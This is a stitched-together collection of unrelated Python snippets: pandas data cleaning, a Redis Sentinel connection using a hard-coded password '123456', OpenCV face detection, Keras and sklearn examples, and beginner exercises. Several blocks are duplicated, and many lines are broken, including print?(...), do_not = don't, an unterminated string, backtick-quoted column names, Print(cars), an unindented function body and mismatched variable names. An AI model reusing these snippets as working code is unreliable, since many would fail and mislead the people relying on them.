print(f"\ncol_one_arr:\n{col_one_arr}\ntype:{type(col_one_arr)}")
df = pd.DataFrame([
    [-0.532681, 'foo', 0],
    [1.490752, 'bar', 1],
    [-1.387326, 'foo', 2],
    [0.814772, 'baz', ' '],     
    [-0.222552, '   ', 4],
    [-1.176781,  'qux', '  '],         
], columns='A B C'.split(), index=pd.date_range('2000-01-01','2000-01-06'))

# replace field that's entirely space (or empty) with NaN
print(df.replace(r'^\s*$', np.nan, regex=True))
df = pd.DataFrame([
    [-0.532681, 'foo', 0],
    [1.490752, 'bar', 1],
    [-1.387326, 'foo', 2],
    [0.814772, 'baz', ' '],     
    [-0.222552, '   ', 4],
    [-1.176781,  'qux', '  '],         
], columns='A B C'.split(), index=pd.date_range('2000-01-01','2000-01-06'))

# replace field that's entirely space (or empty) with NaN
print(df.replace(r'^\s*$', np.nan, regex=True))
nov_mask = df['Dates'].map(lambda x: x.month) == 11
df[nov_mask]

nov_mar_series = pd.Series(pd.date_range("2013-11-15", "2014-03-15"))
#create timestamp without year
nov_mar_no_year = nov_mar_series.map(lambda x: x.strftime("%m-%d"))
#add a yearless timestamp to the dataframe
df["no_year"] = df['Date'].map(lambda x: x.strftime("%m-%d"))
no_year_mask = df['no_year'].isin(nov_mar_no_year)
df[no_year_mask]
from redis.sentinel import Sentinel
sentinel = Sentinel([
    ('192.168.77.130',26379),
    ('192.168.77.130',26380),
    ('192.168.77.130',26381),
],sentinel_kwargs={'password': '123456'}) 

sentinel.discover_master('lerep')
 # single column:
 if `A` in df and `B` in df:
 
 
 # multiple columns:
 pd.Series(['A', 'B']).isin(df.columns).all()
import re
if re.match(r"hello[0-9]+", 'hello1'):
    print('Yes')
import pandas as pd
from datetime import datetime

ps = pd.Series([datetime(2014, 1, 7), datetime(2014, 3, 13), datetime(2014, 6, 12)])
new = ps.apply(lambda dt: dt.replace(day=1))
all_data['Order Day new'] = all_data['Order Day new'].dt.strftime('%Y-%m-%d')
def ffill_cols(df, cols_to_fill_name='Unn'):
    """
    Forward fills column names. Propagate last valid column name forward to next invalid column. Works similarly to pandas
    ffill().
    
    :param df: pandas Dataframe; Dataframe
    :param cols_to_fill_name: str; The name of the columns you would like forward filled. Default is 'Unn' as
    the default name pandas gives unnamed columns is 'Unnamed'
    
    :returns: list; List of new column names
    """
    cols = df.columns.to_list()
    for i, j in enumerate(cols):
        if j.startswith(cols_to_fill_name):
            cols[i] = cols[i-1]
    return cols
>>> from operator import add
>>> list( map(add, list1, list2) )
[5, 7, 9]
class Parent(object):
      def implicit(self):
          print("PARENT implicit()")

class Child(Parent):
      pass
    dad = Parent()
    son = Child()
    
    dad.implicit()
    son.implicit()
x=[]
y=[]
for key, value in genres.items():
    x.append(key)
    y.append(value)
for key in sorted(my_dict, key=my_dict.get):

    print('{} : {}'.format(key, my_dict[key]))
from csv import reader
fp = open('file_name.csv', encoding='utf-8')
data = list(reader(fp))
fp.close()
>>> matches = re.findall(f'(?:{p})+', s)
>>> matches
['HELLO', 'HELLO', 'HELLOHELLOHELLO', 'HELLOHELLO']

>> max(map(len, matches)) // len(p)
3
from setuptools import setup, find_packages

setup(
  name="package-name",
  version="0.0.0",
  packages=find_packages(),
  entry_points = {
    'console_scripts':
      ["command = package_name.module_name:function_name"],
    },
)
and
or
not
!=(not equal)
==(equal)
>=(greater-than-equal)
<=(less-than-equal)
True
False
>>> format(integer, '0>42b')
'001010101111000001001000111110111111111111'
def mlm_loss(y_true, y_pred):
loss=float(0)
a = tf.keras.backend.constant(1, dtype='float32')
for s in range(batch_size): # for each sample in batch
    for i in range(L):
        for j in range(L):
            loss=loss + y_true[s][i]*(a-y_true[s][j])*(a-(y_pred[s][i]-y_pred[s][j])) #two conditions
l= tf.keras.backend.constant(L, dtype='float32')            
loss=a/l*loss           
return loss
def add(a, b):
    print(f"ADDING {a} + {b}")
    return a + b
  
def subtract(a, b):
    print(f"SUBTRACTING {a} - {b}")
    return a - b
# this is like your scripts with argv
def print_two(args):
    arg1, arg2 = args
    print(f"arg1:{arg1}, arg2: {arg2}")
 
# this just takes one argument
def print_one(arg1):
    print(f"arg1:{arg1}")
    
# this one takes no argument
def print_none():
     print?("I got nothin',")
from sys import argv
script, first, second = argv

print("The script is called:", script)
print("The first variable is:", first)
print("The second variable is:", second)
from sys import argv

script, filenames = argv

txt = open(filename)

print(f"Here's your life {filename}:")
print(txt.read())

print("Type the filename again:")
file_open = input(">")

txt_again = open(file_again)
print(txt_again.read())
print("How old are you?", end=' ')
age = input()
print("How tall are you?", end= ' ')
height = input()
print("How much do you weight?", end= ' ')
weight = input()

print(f"So, you're {age} old, {height} tall and {weight} heavy.")
from sys import argv
script, first, second

print("The script is called:", script)
print("your first variable is:", first)
print("your second variable is:, second)
formatter = "{} {} {} {}"

print(formatter.format(1, 2, 3, 4,))
print(formatter.format(one, two, three, four))
print(formatter.format(true, false, false, true))
end1 = "B"
end2 = "u"
end3 = "r"
end4 = "g"
end5 = "e"
end6 = "r"

print(end1 + end2 + end3 + end4 + end5)
A) Detect faces in Image file (using Python & OpenCV)



face_detect.py :
=================

import cv2

face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')

img = cv2.imread('face.jpg')
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)


faces = face_cascade.detectMultiScale(
    gray,
    scaleFactor=1.1,
    minNeighbors=5,
    minSize=(30, 30),
    flags = cv2.CASCADE_SCALE_IMAGE
)

print("Faces shape : ", faces.shape)

for (x,y,w,h) in faces:
    cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)

print("Face count : ", faces.shape[0])

cv2.imshow('img',img)
cv2.waitKey(0)
cv2.destroyAllWindows()


=====================================================================

B) Detect faces using Camera (using Python & OpenCV).


face_detect_cam.py :
====================
import cv2

face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')

cap = cv2.VideoCapture(0)

while True:
	ret, img = cap.read();
	
	if not ret:
		break
		
	gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)

	faces = face_cascade.detectMultiScale(
		gray,
		scaleFactor=1.1,
		minNeighbors=5,
		minSize=(30, 30),
		flags = cv2.CASCADE_SCALE_IMAGE
	)

	for (x,y,w,h) in faces:
		cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
	
	cv2.imshow('Face', img)
	
	key = cv2.waitKey(1)
	if key==27 or key==ord('q'):
		break;

cap.release()
cv2.destroyAllWindows()


types_of_people = 10
x = f"there are {types_of_people} types of people."

binary = "binary"
do_not = don't
y = f"those who know {binary} and those who {do_not}."
cars = 80
drivers = 40
passengers = 70

Print(cars)
# print this line
print("Hello world again")
In [1]: data = [
   ...:     {'id': '10', 'animal' : 'cat'},
   ...:     {'id': '11', 'animal' : 'dog'},
   ...:     {'id': '3', 'animal' : 'pigeon'},
   ...:     {'id': '10', 'color' : 'yellow'},
   ...:     {'id': '11', 'color' : 'brown'},
   ...:     {'id': '3', 'color' : 'grey'},
   ...:     {'id': '10', 'type' : 'furry'},
   ...:     {'id': '11', 'type' : 'fluffy'},
   ...:     {'id': '3', 'type' : 'dirty'},
   ...: ]

In [2]: from collections import defaultdict
   ...: ids = defaultdict(dict)
   ...: for d in data:
   ...:     ids[d["id"]].update(d)
   ...:


In [6]: list(ids.values())
Out[6]:
[{'id': '10', 'animal': 'cat', 'color': 'yellow', 'type': 'furry'},
 {'id': '11', 'animal': 'dog', 'color': 'brown', 'type': 'fluffy'},
 {'id': '3', 'animal': 'pigeon', 'color': 'grey', 'type': 'dirty'}]
d = dict.fromkeys(df.select_dtypes(object).columns, 0)
df = df.assign(**d)
class MyModel(models.Model):
        field1 = models.CharField(max_length=40, blank=False, null=False)
        field2 = models.CharField(max_length=60, blank=True, null=True)
# Open a file: file
file = open('my_text_file',mode='r')
 
# read all lines at once
all_of_it = file.read()
 
# close the file
file.close()
import ast
l = ast.literal_eval('[ "A","B","C" , " D"]')
l = [i.strip() for i in l]
from datetime import datetime, timedelta

d = datetime.today() - timedelta(days=days_to_subtract)
def toDate(dateString): 
    return datetime.datetime.strptime(dateString, "%Y-%m-%d").date()

@app.route()
def event():
    ektempo = request.args.get('start', default = datetime.date.today(), type = toDate)
    ...
from datetime import date
from dateutil.rrule import rrule, DAILY

a = date(2009, 5, 30)
b = date(2009, 6, 9)

for dt in rrule(DAILY, dtstart=a, until=b):
    print dt.strftime("%Y-%m-%d")
# result and path should be outside of the scope of find_path to persist values during recursive calls to the function
result = []
path = []
from copy import copy

# i is the index of the list that dict_obj is part of
def find_path(dict_obj,key,i=None):
    for k,v in dict_obj.items():
        # add key to path
        path.append(k)
        if isinstance(v,dict):
            # continue searching
            find_path(v, key,i)
        if isinstance(v,list):
            # search through list of dictionaries
            for i,item in enumerate(v):
                # add the index of list that item dict is part of, to path
                path.append(i)
                if isinstance(item,dict):
                    # continue searching in item dict
                    find_path(item, key,i)
                # if reached here, the last added index was incorrect, so removed
                path.pop()
        if k == key:
            # add path to our result
            result.append(copy(path))
        # remove the key added in the first line
        if path != []:
            path.pop()

# default starting index is set to None
find_path(di,"location")
print(result)
# [['queryResult', 'outputContexts', 4, 'parameters', 'DELIVERY_ADDRESS_VALUE', 'location'], ['originalDetectIntentRequest', 'payload', 'inputs', 0, 'arguments', 0, 'extension', 'location']]
>>> from sklearn.metrics import f1_score
>>> y_true = [0, 1, 2, 0, 1, 2]
>>> y_pred = [0, 2, 1, 0, 0, 1]
>>> f1_score(y_true, y_pred, average='macro')
0.26...
>>> f1_score(y_true, y_pred, average='micro')
0.33...
>>> f1_score(y_true, y_pred, average='weighted')
0.26...
>>> f1_score(y_true, y_pred, average=None)
array([0.8, 0. , 0. ])
>>> y_true = [0, 0, 0, 0, 0, 0]
>>> y_pred = [0, 0, 0, 0, 0, 0]
>>> f1_score(y_true, y_pred, zero_division=1)
1.0...